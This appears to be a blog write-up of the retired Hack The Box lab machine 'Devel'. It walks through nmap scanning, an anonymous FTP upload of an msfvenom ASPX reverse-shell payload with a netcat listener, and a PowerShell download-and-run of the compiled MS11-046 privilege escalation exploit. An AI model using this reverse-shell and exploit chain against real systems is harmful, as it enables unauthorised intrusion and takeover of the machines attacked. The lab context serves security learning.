Devel - Hack The Box (HTB) writeup w/o Metasploit
Hack The Box is online platform helps in learning penetration testing.
Devel is a retired box with difficulty level Easy.
Start with nmap
#nmap -sC -sV 10.10.10.5
- -sC scan using default scripts against the target
- -sV enumerated versions
Two ports open: 21 (ftp) and 80 (http)
Use nmap to scan all ports (0-65535)
#nmap -p- 10.10.10.5 | tee nmap nmap-all-ports.txt
- -p- scan all ports
- tee save it in the file and also gives standard output
nmap UDP scan
#nmap -sU 10.10.10.5 | tee nmap-udp.txt
No ports found in UDP scan
Check webpage as port 80 open
Anonymous login allowed on ftp. Try to upload test.html
Successfully upload test.html. This gives an idea of upload payload and gets a reverse shell.
msfvenom - tool to create reverse shell
List all modules for formats
#msfvenom -l formats
List all windows paylods.
#msfvenom --
list payloads | grep windows
Create payload by using msfvenom
#msfvenom -p windows/shell_reverse_tcp -f aspx LHOST=10.10.10.21 LPORT=1111 -o shell.aspx
Upload payload on server as anonymous login is allowed on ftp.
#put shell.aspx
Getting reverse shell
#nc -lvnp 1111
Get shell.
Try to access folder Administrator and babis, but access denied.
Privilege Escalation
#systeminfo
The operating system is Windows 7 Enterprise but no hotfix is installed. This gives an idea to execute any existing exploit. Search on it on google and found MS11-046. EDB-ID is 40564 and CVE 2011-1249.
#searchsploit -m 40564
Refer exploit notes to understand how to compile exploit code.
Compile by using below command:
#i686-w64-mingw32-gcc 40564.c -o MS11-046.exe -lws2_32
Upload it on machine
#powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.10.14.21:2222/MS11-046.exe', 'C:\Users\Public\Downloads\MS11-046.exe')"
Run privilege escalation exploit
#MS11-046.exe
Get root
Subscribe us to receive more such articles updates in your email.
If you have any questions, feel free to ask in the comments section below. Nothing gives me greater joy than helping my readers!
Disclaimer: This tutorial is for educational purpose only. Individual is solely responsible for any illegal act.